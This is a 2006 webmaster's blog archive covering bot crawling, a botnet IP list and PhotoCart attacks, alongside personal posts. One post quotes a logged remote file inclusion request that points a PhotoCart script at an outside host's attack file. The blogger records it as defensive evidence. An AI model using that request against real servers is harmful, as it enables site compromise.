Sunday, December 31, 2006

Complete Botnet List Used in PhotoCart Attack

This is probably a small botnet with only 174 IPs involved in currently trying to infect a single website using the PhotoCart vulnerability. I decided to show just far these people are willing to go in order to attempt bypassing possible firewall blocks just to make sure one of them is successful.

Here's the complete botnet list:

140.117.73.1 [finance.nsysu.edu.tw.] requested 379 pages as "libwww-perl/5.805"
147.202.41.61 [x.xhort.com.] requested 29 pages as "libwww-perl/5.805"
158.66.1.12 [service2.mg.gov.pl.] requested 178 pages as "libwww-perl/5.65"
163.178.79.2 [unknown] requested 41 pages as "libwww-perl/5.803"
164.77.213.115 [unknown] requested 1 pages as "libwww-perl/5.805"
189.146.75.42 [dsl-189-146-75-42.prod-infinitum.com.mx.] requested 321 pages as "libwww-perl/5.803"
189.146.80.14 [dsl-189-146-80-14.prod-infinitum.com.mx.] requested 272 pages as "libwww-perl/5.803"
193.192.247.209 [209-sn-5-be.pchighway.com.] requested 1 pages as "libwww-perl/5.805"
194.108.42.38 [sip1.it-help.cz.] requested 7 pages as "libwww-perl/5.803"
194.152.183.230 [unknown] requested 19 pages as "libwww-perl/5.805"
194.177.97.82 [82-97-177-194.serverdedicati.seflow.net.] requested 87 pages as "libwww-perl/5.79"
195.10.193.5 [mailer.fastnetbg.com.] requested 36 pages as "libwww-perl/5.803"
195.206.96.40 [kabsieasy.aic.at.] requested 4 pages as "libwww-perl/5.63"
195.242.211.253 [faq.ecobike.de.] requested 64 pages as "libwww-perl/5.48"
195.242.98.223 [keurigonline07.nl.] requested 51 pages as "libwww-perl/5.79"
198.173.254.167 [sofsup.securesites.net.] requested 14 pages as "libwww-perl/5.65"
198.173.254.49 [gmotion.net.] requested 85 pages as "libwww-perl/5.65"
200.32.10.19 [200-32-10-19.prima.net.ar.] requested 29 pages as "libwww-perl/5.805"
200.73.10.171 [servidor2.icqnet.cl.] requested 39 pages as "libwww-perl/5.805"
200.75.49.133 [clientes_corpor_7549-133.etb.net.co.] requested 6 pages as "libwww-perl/5.64"
202.130.106.156 [unknown] requested 33 pages as "libwww-perl/5.79"
202.139.20.8 [nm8.shoalhaven.net.au.] requested 27 pages as "libwww-perl/5.805"
202.143.173.2 [unknown] requested 2 pages as "libwww-perl/5.65"
202.181.245.88 [unknown] requested 20 pages as "libwww-perl/5.805"
202.83.173.216 [ntc.net.pk.] requested 104 pages as "libwww-perl/5.65"
202.85.134.241 [mail.icreationasia.com.] requested 42 pages as "libwww-perl/5.65"
203.146.140.221 [besthost5.com.] requested 127 pages as "libwww-perl/5.64"
203.167.111.133 [133.111.167.203.assigned.static.eastern-tele.com.] requested 69 pages as "libwww-perl/5.79"
203.167.88.76 [unknown] requested 47 pages as "libwww-perl/5.65"
203.194.134.166 [unknown] requested 386 pages as "libwww-perl/5.65"
203.211.135.130 [130.203-211-135.static.qala.com.sg.] requested 5 pages as "libwww-perl/5.805"
203.223.133.18 [unknown] requested 41 pages as "libwww-perl/5.805"
203.88.121.128 [acr2.soho.aussiehq.net.au.] requested 43 pages as "libwww-perl/5.805"
204.11.234.28 [vn1133.fireboxhosting.com.] requested 159 pages as "libwww-perl/5.805"
204.157.36.20 [unknown20.36.157.204.defenderhosting.com.] requested 56 pages as "libwww-perl/5.805"
204.16.246.8 [gttcp18.30u.com.] requested 302 pages as "libwww-perl/5.805"
205.234.100.65 [unknown65.100.234.205.defenderhosting.com.] requested 64 pages as "libwww-perl/5.805"
205.234.223.229 [unknown.hostforweb.com.] requested 219 pages as "libwww-perl/5.805"
206.123.101.20 [server005.hostspectrum.com.] requested 84 pages as "libwww-perl/5.805"
206.222.19.42 [ns1.ultranetgroup.net.] requested 91 pages as "libwww-perl/5.79"
206.225.92.93 [206-225-92-93.dedicated.abac.net.] requested 330 pages as "libwww-perl/5.803"
207.158.61.3 [ns1.control8.com.] requested 160 pages as "libwww-perl/5.79"
207.99.63.90 [unknown] requested 31 pages as "libwww-perl/5.79"
208.101.29.107 [asprojectos.com.] requested 371 pages as "libwww-perl/5.805"
209.151.94.9 [poplar.vosn.net.] requested 337 pages as "libwww-perl/5.805"
209.172.35.53 [ip-209-172-35-53.reverse.privatedns.com.] requested 217 pages as "libwww-perl/5.79"
209.47.139.138 [server.privatelabelarticlesite.net.] requested 46 pages as "libwww-perl/5.805"
209.47.167.151 [server1.web-marketing-concepts.com.] requested 32 pages as "libwww-perl/5.805"
209.97.207.116 [cowboywebdesigns.com.] requested 48 pages as "libwww-perl/5.65"
210.172.116.244 [unknown] requested 59 pages as "libwww-perl/5.803"
212.12.121.43 [as01-14-212-12-121-43.ip.housing-manager.de.] requested 18 pages as "libwww-perl/5.803"
212.176.124.197 [PBOUL-Chumak2-gw.RoSprint.net.] requested 27 pages as "libwww-perl/5.805"
212.227.83.106 [p15188117.pureserver.info.] requested 130 pages as "libwww-perl/5.76"
212.25.170.80 [wnx-10.seeweb.it.] requested 41 pages as "libwww-perl/5.803"
213.186.116.86 [opel-club.colo.dc.utel.ua.] requested 31 pages as "libwww-perl/5.805"
213.228.142.27 [pal-213-228-142-27.netvisao.pt.] requested 18 pages as "libwww-perl/5.803"
213.234.229.221 [ns1.siriust.ru.] requested 33 pages as "libwww-perl/5.805"
216.16.246.154 [server154.ntouch.ca.] requested 35 pages as "libwww-perl/5.805"
216.17.109.39 [bo.phatservers.com.] requested 449 pages as "libwww-perl/5.805"
216.193.194.223 [abante.lunarpages.com.] requested 93 pages as "libwww-perl/5.805"
216.22.48.208 [216.22.48.208.servint.net.] requested 35 pages as "libwww-perl/5.805"
216.227.220.4 [xena.lunarpages.com.] requested 92 pages as "libwww-perl/5.805"
216.246.45.72 [unknown.scnet.net.] requested 38 pages as "libwww-perl/5.805"
216.55.166.52 [216-55-166-52.dedicated.abac.net.] requested 81 pages as "libwww-perl/5.803"
217.112.42.20 [unknown] requested 22 pages as "libwww-perl/5.79"
217.115.84.178 [mail.continentall.ru.] requested 26 pages as "libwww-perl/5.805"
217.128.167.99 [LPuteaux-151-42-8-99.w217-128.abo.wanadoo.fr.] requested 19 pages as "libwww-perl/5.803"
217.70.144.89 [serverclienti.com.] requested 25 pages as "libwww-perl/5.65"
218.38.14.205 [unknown] requested 93 pages as "libwww-perl/5.79"
219.93.90.33 [unknown] requested 36 pages as "libwww-perl/5.65"
219.94.128.150 [www910.sakura.ne.jp.] requested 150 pages as "libwww-perl/5.805"
220.134.22.185 [main.ethantw.tw.] requested 17 pages as "libwww-perl/5.805"
221.126.152.218 [unknown] requested 3 pages as "libwww-perl/5.65"
221.127.101.145 [unknown] requested 2 pages as "libwww-perl/5.65"
38.100.80.201 [spongebob.jewlzk.com.] requested 1 pages as "libwww-perl/5.805"
62.193.229.152 [host4.i-excom.net.] requested 158 pages as "libwww-perl/5.64"
62.221.213.68 [unknown] requested 34 pages as "libwww-perl/5.65"
62.4.70.180 [62.4.70.180.fantasyvirtual.com.] requested 153 pages as "libwww-perl/5.803"
62.94.87.159 [159reverse.gestinweb.it.] requested 17 pages as "libwww-perl/5.805"
63.246.154.22 [ukrainehosting.info.] requested 6 pages as "libwww-perl/5.805"
63.247.138.144 [excalibur.rtsdns.net.] requested 48 pages as "libwww-perl/5.805"
64.191.28.101 [brick5.hostnoc.net.] requested 140 pages as "libwww-perl/5.805"
64.191.56.190 [cricket.sulteia.com.] requested 4 pages as "libwww-perl/5.805"
64.235.234.128 [gemini.lunarpages.com.] requested 186 pages as "libwww-perl/5.805"
64.34.161.52 [img.iuploads.com.] requested 80 pages as "libwww-perl/5.805"
64.38.11.6 [managed.voipbiz.us.] requested 1 pages as "libwww-perl/5.79"
64.38.24.138 [server1.caribehost.com.] requested 62 pages as "libwww-perl/5.805"
64.8.114.12 [64-8-114-12.yourhostingprovider.net.] requested 142 pages as "libwww-perl/5.801"
64.8.114.14 [web-06.ihservers.com.] requested 238 pages as "libwww-perl/5.801"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 773 pages as "libwww-perl/5.801"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 1188 pages as "libwww-perl/5.801"
64.8.124.64 [64-8-124-64.yourethehost.net.] requested 82 pages as "libwww-perl/5.801"
65.38.168.212 [2yellow.veraserve.com.] requested 72 pages as "libwww-perl/5.805"
65.42.183.2 [walrus.bytehead.com.] requested 300 pages as "libwww-perl/5.79"
65.99.196.23 [unknown] requested 89 pages as "libwww-perl/5.805"
66.103.152.111 [server22.internet-hosting-services.com.] requested 281 pages as "libwww-perl/5.805"
66.151.255.65 [server.by016.net.] requested 3 pages as "libwww-perl/5.805"
66.159.142.166 [66-159-142-166.adsl.snet.net.] requested 1 pages as "libwww-perl/5.803"
66.234.10.177 [ns7.digicc.net.] requested 49 pages as "libwww-perl/5.65"
66.235.206.151 [host223.ipowerweb.com.] requested 66 pages as "libwww-perl/5.805"
66.235.221.231 [host131.ipowerweb.com.] requested 107 pages as "libwww-perl/5.805"
66.240.252.55 [su9325255.aspadmin.net.] requested 12 pages as "libwww-perl/5.803"
66.254.98.142 [angels.reflected.net.] requested 132 pages as "libwww-perl/5.803"
66.40.38.148 [host148.maxim.net.] requested 19 pages as "libwww-perl/5.65"
66.55.78.18 [66-55-78-18.yourhostingprovider.net.] requested 89 pages as "libwww-perl/5.801"
66.7.193.220 [interzone.shiftinteractive.net.] requested 170 pages as "libwww-perl/5.805"
66.70.121.80 [unknown] requested 96 pages as "libwww-perl/5.65"
67.159.26.45 [sanalsistem.net.] requested 7 pages as "libwww-perl/5.805"
67.159.26.99 [.] requested 62 pages as "libwww-perl/5.805"
67.18.16.82 [srv24.icx.pl.] requested 1 pages as "libwww-perl/5.805"
67.19.224.66 [lamda.asmallorange.com.] requested 84 pages as "libwww-perl/5.805"
67.19.65.132 [84.41.1343.static.theplanet.com.] requested 433 pages as "libwww-perl/5.805"
67.19.74.138 [www2.comradelycertitude.com.] requested 227 pages as "libwww-perl/5.805"
67.19.85.196 [c4.55.1343.static.theplanet.com.] requested 343 pages as "libwww-perl/5.805"
68.179.54.20 [static-68-179-54-20.ptr.terago.ca.] requested 123 pages as "libwww-perl/5.65"
68.186.32.50 [68-186-32-50.static.scrm.ca.charter.com.] requested 61 pages as "libwww-perl/5.79"
69.10.142.59 [unknown.rackforce.com.] requested 187 pages as "libwww-perl/5.805"
69.13.6.170 [unknown] requested 136 pages as "libwww-perl/5.53"
69.26.178.210 [iota.sitelutions.com.] requested 304 pages as "libwww-perl/5.805"
69.56.180.222 [de.b4.3845.static.theplanet.com.] requested 131 pages as "libwww-perl/5.805"
69.93.107.114 [72.6b.5d45.static.theplanet.com.] requested 5 pages as "libwww-perl/5.805"
70.84.122.194 [web1.titansolutions.net.] requested 267 pages as "libwww-perl/5.805"
70.84.220.210 [d2.dc.5446.static.theplanet.com.] requested 518 pages as "libwww-perl/5.805"
70.85.247.250 [fa.f7.5546.static.theplanet.com.] requested 35 pages as "libwww-perl/5.805"
70.85.66.162 [wobbuffet-202.pokemonpalace.net.] requested 205 pages as "libwww-perl/5.805"
70.86.151.130 [82.97.5646.static.theplanet.com.] requested 722 pages as "libwww-perl/5.65"
70.86.36.194 [titan.websiteactive.com.] requested 155 pages as "libwww-perl/5.805"
72.22.69.189 [host503.ipowerweb.com.] requested 63 pages as "libwww-perl/5.76"
72.232.141.146 [146.141.232.72.reverse.layeredtech.com.] requested 54 pages as "libwww-perl/5.805"
72.232.178.114 [bullfrog.frogee.com.] requested 27 pages as "libwww-perl/5.805"
72.232.233.170 [g1.eth4.colo1.cust3.fuzionservers.com.] requested 171 pages as "libwww-perl/5.805"
72.249.16.108 [actstwo.com.] requested 32 pages as "libwww-perl/5.805"
72.29.66.235 [bravo.dnshttp.com.] requested 31 pages as "libwww-perl/5.805"
72.29.71.74 [ggs-t.ggs-t.com.] requested 31 pages as "libwww-perl/5.805"
72.29.74.43 [deso.surpasshosting.com.] requested 61 pages as "libwww-perl/5.805"
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 445 pages as "libwww-perl/5.805"
72.29.82.174 [pass57.dizinc.com.] requested 4 pages as "libwww-perl/5.805"
72.29.83.98 [jet33.hasweb.com.] requested 254 pages as "libwww-perl/5.805"
72.3.249.214 [ashopsoftware.com.] requested 50 pages as "libwww-perl/5.65"
72.35.81.67 [www70.privatelabeldns.com.] requested 235 pages as "libwww-perl/5.79"
72.36.156.123 [osd1.myhostcenter.com.] requested 98 pages as "libwww-perl/5.805"
72.5.54.51 [web13.lx.host.inap.sea.dotster.net.] requested 149 pages as "libwww-perl/5.65"
72.51.34.179 [unknown] requested 11 pages as "libwww-perl/5.79"
72.51.35.81 [ssnakess.com.] requested 325 pages as "libwww-perl/5.805"
74.52.1.10 [buycheaperwebhosting.com.] requested 58 pages as "libwww-perl/5.805"
74.52.133.146 [92.85.344a.static.theplanet.com.] requested 115 pages as "libwww-perl/5.805"
74.52.208.138 [8a.d0.344a.static.theplanet.com.] requested 3 pages as "libwww-perl/5.805"
74.52.68.106 [theshire.caffeinepress.co.uk.] requested 213 pages as "libwww-perl/5.805"
74.52.84.138 [8a.54.344a.static.theplanet.com.] requested 16 pages as "libwww-perl/5.805"
76.169.115.66 [cpe-76-169-115-66.socal.res.rr.com.] requested 81 pages as "libwww-perl/5.65"
80.239.140.226 [megahost.pl.] requested 14 pages as "libwww-perl/5.803"
80.39.80.183 [183.Red-80-39-80.staticIP.rima-tde.net.] requested 12 pages as "libwww-perl/5.65"
80.77.86.243 [unknown] requested 104 pages as "libwww-perl/5.805"
81.169.186.195 [moncserver.de.] requested 557 pages as "libwww-perl/5.803"
81.181.15.6 [unknown] requested 96 pages as "libwww-perl/5.805"
81.181.89.42 [unknown] requested 208 pages as "libwww-perl/5.805"
81.183.219.157 [dsl51B7DB9D.fixip.t-online.hu.] requested 106 pages as "libwww-perl/5.803"
81.208.31.216 [81-208-31-216.ip.fastwebnet.it.] requested 8 pages as "libwww-perl/5.79"
82.165.231.16 [u15174557.onlinehome-server.com.] requested 122 pages as "libwww-perl/5.79"
82.165.27.174 [p15173001.pureserver.info.] requested 36 pages as "libwww-perl/5.76"
82.165.36.226 [russellgrantastrology.com.] requested 147 pages as "libwww-perl/5.65"
82.210.7.28 [82.210.7.28.rev.worldbone.de.] requested 29 pages as "libwww-perl/5.803"
83.138.166.13 [s79719.lovehorse.co.uk.] requested 41 pages as "libwww-perl/5.79"
83.15.63.115 [eih115.internetdsl.tpnet.pl.] requested 5 pages as "libwww-perl/5.803"
83.65.104.210 [83-65-104-210.klagenfurt-nord.xdsl-line.inode.at.] requested 55 pages as "libwww-perl/5.69"
85.214.19.18 [copyworld-kiel.de.] requested 294 pages as "libwww-perl/5.69"
85.25.134.185 [alpha961.server4you.de.] requested 23 pages as "libwww-perl/5.803"
87.236.194.104 [unassigned-87.236.194.104.coolhousing.net.] requested 55 pages as "libwww-perl/5.805"
88.149.156.142 [www.futurweb.info.] requested 24 pages as "libwww-perl/5.803"
89.108.80.229 [server2.vlr.ru.] requested 40 pages as "libwww-perl/5.805"
89.207.232.18 [unknown] requested 37 pages as "libwww-perl/5.79"
I haven't fully processed this list yet, but 17 of these IPs are in blocks assigned to theplanet.com.

The only thing I find most amusing here is we hear so much about compromised home computers being involved in botnets and this batch, for the most part, appears to be primarily dedicated servers in data centers.

This just verifies what I've been preaching about blocking access to your server from data centers as they are a source of many problems from scrapers to hackers.

Saturday, December 30, 2006

PhotoCart vulnerability claims another website

UPDATE: 12/31 and it appears Softlayer took the server on IP 208.101.16.120 offline at this time. The PhotoCart attackers apparently aren't aware of this yet because there is still an ongoing attack referencing empzone.com as I write this. At least it will do no harm to innocent sites at the moment. Thank You Softlayer for the prompt action.

The latest wave of PhotoCart vulnerability attacks just claimed a new website.

This time they claimed Husnaweb.com, someone's blog, as a victim.

I first notified the owner of Husnaweb and the data center Softlayer of the problem on 12/20. They promptly removed the file http://www.husnaweb.com/c.in from the server and the PhotoCart attacks stopped for a couple of days. Then the attacks started up again when the file showed up on the server again, so apparently Husnaweb was still vulnerable itself and being actively exploited.

I wrote back to the site owner and Softlayer again on 12/25 assuming they would deal with it eventually, being it was a holiday, and today noticed they appear to have simply given up on the blog as Husnaweb is gone and it's now a parked page on GoDaddy.

Today the attacks started up all over again using this page request:

"GET /PhotoCart/adminprint.php?path=http://empzone.com/c.ar?"

host empzone.com has address 208.101.16.120
host 208.101.16.120 -> 208.101.16.120-static.reverse.baserunner.net

whois 208.101.16.120

OrgName: SoftLayer Technologies Inc.
OrgID: SOFTL
Address: 1950 N Stemmons Freeway
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US

NetRange: 208.101.0.0 - 208.101.63.255
Looks like empzone.com will be their next victim, notifying data center Softlayer yet again that another Softlayer customer has been breached.

Anyone notice a trend here?

The other site I reported about, wnydir.com, was also a Softlayer customer.
host wnydir.com has address 208.101.16.120
host 208.101.16.120 -> 208.101.16.120-static.reverse.baserunner.net
The reverse DNS on the sites all point to baserunner.net which says "Coming Soon", no contact information.

I must be getting slow in my old age, they're all on the same IP address, it would appear that the server has been compromised.

Ah well, this makes my next letter to Softlayer a little different now doesn't it?

Friday, December 29, 2006

The Zen of MP3 Part Deux Point Oh

Well, I was a bad boy and dropped my Zen micro one too many times. A few days ago I dropped the damn thing and it came up with a panic menu with options like FORMAT, REBOOT, and all sorts of goodies. Luckily a few minutes later it came back to life and ran for a couple of days more until, you guessed it, I dropped it again and it won't get past the failure menu.

DEAD.

It's really sad, you can hear the hard disk scraping when you put your ear to the Zen Micro, just sad.

Anyway, I ran out to Worst Buy the next day and got a replacement Zen and this time picked the black version of the 4GB Zen V Plus which is about half the size of the Zen Micro, has a color display, can show pictures and videos, quite a cute little toy. Didn't even have to install new software or a new USB cable as it works with my existing USB cable just fine. Uploaded all my MP3's and Yahoo Music and was back in action in no time.

For those of you about to ask why I didn't get an iPod, my wife has 2 of the fucking things and I hate using them. More than I loathe Apple and the crappy iPod interface, I loathe being locked into iTunes. They can take that proprietary shit and shove it which is why I also didn't get a Zune although they looked pretty cool. She didn't buy them either, they were gifts, so she's just stuck using them to be polite. FWIW, she picked my first Zen for me as a present so we all know what she prefers!

The new Zen V rocks!

It's not touch sensitive like the old Zen Micro and has mechanical switches and everything is flush to the case so it's damn near next to impossible to accidentally engage a command so I've not used the LOCK function yet.

The only downsides I've seen so far is that scrolling the list of All Tracks is slower than shit and if your unit LOCKS UP, which mine did once setting it up, the RESET button on the side needs tools that only a microbiologist would possess to depress that micro button. Word to the wise, keep a safety pin handy in case it locks up because you can't open the back and remove the battery or anything useful like that, you're just fucked without micro-tools handy.

Since I was replacing the Zen it seemed a no brainer to treat myself with a pair of new headphones and got a set of Bose Triport headphones which are very nice. Not the most expensive Bose headphones out there, but they sound damn nice compared to the Sony headphones I was using.

Yes, the Bose are big but I hate earbuds.

Anyway, this time the Zen upgrade was completely painless and I'm a happy boy with a new toy.

Wednesday, December 27, 2006

Ho! Ho! Ho! I'm Baaaaack....

Went away for a few days to visit my Mom in Nevada for Christmas, a brief 5 hour drive, and surprisingly had very little separation anxiety from the computer, internet, blog or any of this crap. Maybe the free Wifi helped with the 'net separation anxiety but I digress.

Rented the usual suite at the Holiday Inn Express, which is by far the best hotel in that pit of a Nevada town. Got a nice 55" HDTV with a DVD player in the living room and a huge whirlpool tub in the bedroom. They have free WiFi of course, mentioned above, which I used sparingly just to keep an eye on my sites and make sure they were up and collecting coin.

Quite nice for the price.

Brought a couple of DVD's to watch at night, some bourbon for the whirlpool, and I was good to go.

Sadly, the cat had a crappy Christmas as he had a traumatic moment right before we left. We were just about to head out to my mom’s place and for reasons unknown the cat decided to sit right between where my wife and I were standing fairly close together. Suddenly, my wife accidentally steps on the cats paw at which point he screams. She hears this noise and quickly turns around to see what’s wrong with the cat, still standing on his paw grinding it further into the carpet as she turns on it. The cat starts hissing, spitting, screaming and flipping out.

She finally realized what was going on and takes her foot off the cat at which point there was one pissed off ball of flying fur running through the house. The cat, in typical cat fashion, was hiding under everything until I finally captured him 15 minutes later. Upon close inspection the cat turned out to be very upset but completely unhurt from being stepped upon.

Unfortunately, we had to leave while he was still bent out of shape and luckily for us he wasn’t holding a grudge and was happy to see us when we got back the next day.

Now the fun part of this short holiday vacation was the bad weather on the return trip.

Almost all the way back to Reno and beyond there were very high winds 45 mph and higher that were kicking up dust and sand storms, pelting my car with rocks, and there were huge tumbleweeds rolling all over the roads. One of the big tumbleweeds got pulverized by the SUV in front of my car and we got pelted with all the tumbleweed chunks. We managed to get past Reno right before before a couple of 18 wheelers got blown over, one of them a Walmart truck according to the news.

If the wind, dust, rocks and tumbleweeds weren't bad enough, we had pouring rain west of Sacramento and the wind was still blowing hard which caused a lot of traffic jams as the nervous drivers all started breaking everywhere.

Took forever to get home...

Don't you just *LOVE* the holidays?

BAH! HUMBUG!

Friday, December 22, 2006

PhotoCart Attack Takes a Holiday

So far I've gotten 3 or 4 sites shut down or cleaned up where the botnet of PhotoCart attackers have been storing their include files. Been quiet for a couple of days now since the last one was cleaned up so I'm wondering if, who am I kidding, WHEN the attacks will start up again with a file referenced from yet another new location.

I didn't even bother posting about the last attack and domain they used as I got it cleaned up pretty quick and the source of the attack was pretty much the same.

So you PhotoCart hacking clowns, ready for me to shut down your next site or should we go after your botnet instead?

Come on, make my day...

First Look - SMBot 1.0 Crawls via Amazon Web Services

Maybe this is how Amazon responded to my tongue-in-cheek request to set the user agent on their crawler.

I have no clue why SpecificMedia would be attempting to crawl my site, or why they are coming from an Amazon IP address. Maybe it's possible when you hire the AWS for a specific task they just plug in the customer name as the UA. Perhaps Amazon just auctioned off the user agent to the highest bidder for some viral marketing thing, who knows.

Anyway, here's the IP's and the user agent seen crawling:

216.182.231.65
[domU-12-31-33-00-03-EB.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.225.220
[domU-12-31-33-00-03-92.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.231.59
[domU-12-31-33-00-03-ED.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.228.145
[domU-12-31-33-00-02-53.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.230.236
[domU-12-31-33-00-03-26.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.225.180
[domU-12-31-33-00-03-02.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.231.86
[domU-12-31-33-00-03-D8.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.231.93
[domU-12-31-33-00-03-CF.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.228.139
[domU-12-31-33-00-02-55.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.230.163
[domU-12-31-33-00-03-6D.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"

216.182.231.20
[domU-12-31-33-00-04-16.usma1.compute.amazonaws.com.]
"SMBot/1.1 (www.specificmedia.com)"
Just what we need, more crap crawling the web.

Joy.

Blog Pimps and Web Whores

When you have a new product or service and can't get anyone to write about it, what do you do?

You go to a Blog Pimp for help, that's what you do!

The Pimp will hook your ass up with some blogging Web Whore that will review your shit for a fee ranging from $40-$500. Let's get serious now people, if you have a really worthwhile opinion you can make a heck of a lot more than 40 freaking dollars. The most common amount on the high end seems to be around $100 which isn't bad if you can knock out several paid reviews a day.

Here's the only problem I see with this scenario is that many people may get annoyed and stop reading your blog if every post, or every other post, becomes some paid fluff piece.

If you're a serious blogger and have spent a substantial amount of time building up your brand so that you can attract traditional advertisers then why in hell would you risk polluting your brand with paid posts?

The next thing you know the advertisers paying for the posts will insist on the comments for those posts being censored, or the blogger will censor them by default just in the hopes of appeasing the advertiser and getting more paid post work in the future.

That's the problem with being a paid Web Whore is that you start down that slippery slope of selling your soul to the highest bidder and your blog suddenly really isn't your blog anymore and you'll feel stifled in your own creation.

Good luck with those paid posts and let me know how selling out works for you all.

P.S. Just for giggles I browsed some of the blogs listed and this site ranked as high as some of the sites asking for $100 per review, which is really sad. Caveat Emptor.

Wednesday, December 20, 2006

SEM Nightmare - Yahoo Thinks I'm a Typo

UPDATE: Thanks to help from Danny Sullivan getting in touch with Tim Mayer over at Yahoo, this has been fixed.

Here's a recent and strange twist in the ever changing Yahoo landscape, I'm a typo.

That's right, this must've happened just recently too, searching for INCREDIBILL shows results for INCREDIBLE instead of what I actually typed, but I still show up in #10. Those poor folks at Incredibill.com, the billing company, aren't even in the top 100. Now change the search to use quotes and search for "INCREDIBILL" and you get the results that I expected in the first place, and that billing company shows up #6.

I have to ask WTF is up with this shit?

Did I accidentally piss in someone's cornflakes at Yahoo and get a handjob in the search engine to make sure people can't find my tirades that may occasionally point out some flaws in Yahoo?

Maybe they just decided they know best about what you wanted to find regardless of what you typed and decided to give us all a big corporate dose of "WE'RE SMARTER SO FUCK YOU!" with the search results.

Now the SEM implications here are huge as brand names are never dictionary words and Yahoo making assumptions about what you MIGHT want based on the nearest actual word in the dictionary is a potentially nasty turn of events.

Anyone else notice any obviously bizarre results lately for certain searches?

Let's compare notes...

Tuesday, December 19, 2006

Heads Up! Here comes Attributor

There's something new on the horizon in the rash of copyright protection services called Attributor that announced major VC funding yesterday. The WSJ ran a piece about how Attributor will scan the web for violations, and noted the founders are ex-Yahooligans.

Did a quick look at Attributor and they seem to be on the Yahoo backbone which is interesing.

host attributor.com
attributor.com has address 68.142.234.103
attributor.com has address 68.142.234.104
attributor.com has address 68.142.234.105
attributor.com has address 68.142.234.106
attributor.com has address 68.142.234.76
attributor.com has address 68.142.234.77

host 68.142.234.103
103.234.142.68.in-addr.arpa domain name pointer p3w10.geo.re2.yahoo.com.

host 68.142.234.104
104.234.142.68.in-addr.arpa domain name pointer p3w11.geo.re2.yahoo.com.

host 68.142.234.77
77.234.142.68.in-addr.arpa domain name pointer p3w9.geo.re2.yahoo.com.

whois 68.142.234.77

OrgName: Inktomi Corporation
OrgID: INKT
Address: 701 First Ave
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US

NetRange: 68.142.192.0 - 68.142.255.255
Didn't notice anything obvious crawling from that range in my blocked bots log but it's possible I let them slide because they are within the Yahoo/Inktomi range, will need to check that out.

However, the WSJ article did mention that they have "...begun testing a system to scan the billions of pages on the Web..." and that "The company says it will have over 10 billion Web pages in its index before the end of this month." which I find hard to believe they crawled on their own completely unnoticed unless they are sharing Yahoo's cache.

No clue at the moment, but keep an eye out for whatever this is.

Let the Yahoo IP address hysteria start in 5... 4... 3... 2....

Blog Tag - 5 Things You Don't Want To Know About IncrediBILL

I got tagged by SpamHuntress and Skore in the ongoing game of blog tag, maybe others tagged me, who knows.

Anyway, here goes with 5 things you don't know about me:

  1. Once upon a time I was a budding musician that played both soprano and bass clarinet in the St Joseph, MO Municipal Band playing Big Band music and Show Tunes. Also played a fair amount of classical in the Missouri Western State University's college symphony. However, I threw in the towel on tooting a horn when the computer bug bit me hard and it turned into a full-time career.
  2. After taking 4 whole years of French in high school, 15 years later spent 3 whole days in Paris. Now the irony is I didn't take typing in HS and took French instead, yet now spend all day every day typing at the computer and rarely ever speak French.
  3. Paintball is one of my favorite hobbies and I will shoot your ass where you stand and giggle with glee at your new found pain.
  4. I roller skate! Even backwards and sideways! We're talking about the REAL 4 wheel skates, none of that pansy ass inline skating crap.
  5. I love playing cards on Pogo.com and you can often catch me there as "IncrediBILL_" playing Spades, Hearts, Gin, Canasta, Cribbage, etc.. Bring your A-game if you look me up for a game or two as I'm a fierce competitor in cards, just ask my wife who I frequently trounce ;)
Now let's tag 5 people that might be interesting like Martinibuster, John Andrews, Willmacc, Phil Maher and Aaron Pratt.

Something Squirrelly Tried to Grab-My-Site

Caught something attempting to speed through my site with downloading on the agenda:

209.253.35.226 [bscop.bluesquirrel.com.] requested 340 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1.)"
Went to Blue Squirrel's site to see what they were and big surprise they have some website downloading tools like Grab-a-site and WebWhacker.

Here's my favorite part where the Grab-a-site software's options default to stealth mode:
User Agent - Lets you set how Grab-a-Site reports itself to the web servers. By default, it sends "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1.)" which makes it look like an Internet Explorer version 6.0.
This product may be responsible for some of the stealth activity we see in our log files and it's obviously trying to hide from webmasters otherwise the default UA would be the name of the product and not MSIE 6.0.

Saturday, December 16, 2006

Compromised Within My Own Data Center

Today was interesting as I noticed a couple of servers within my own data center taking aim at my servers. One IP address was attempting a bazillion user names and passwords on SSH and the other IP address was scanning pages on the web server. Now scanning pages on the web server isn't such a big deal, but when I went to look at the server and see who they were, it attempted to inject a virus into my computer using a browser vulnerability.

Just finished reporting both incidents to the support staff at the hosting company and we'll wait and see how they respond. If they leave the virus injecting server online I will probably have to take my business elsewhere as that's just not cool, and of course everyone will find out who they are and what they said at that point.

Now we wait...

Friday, December 15, 2006

New Crawling From EV1Servers

No clue what this is or who it's related to yet, but it's definitely a bot of some sort doing a crawl distributed over a d-block at EV1. Since it was from their data center it was already blocked and fed breadcrumb pages to see where the data shows up, if ever.

Here's the alarm it set off...

PROXIMITY ALERT!
209.85.54. [ev1s-209-85-54-130.ev1servers.net.]

209.85.54.130 pages 6- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.132 pages 4- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.134 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.135 pages 5- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.137 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
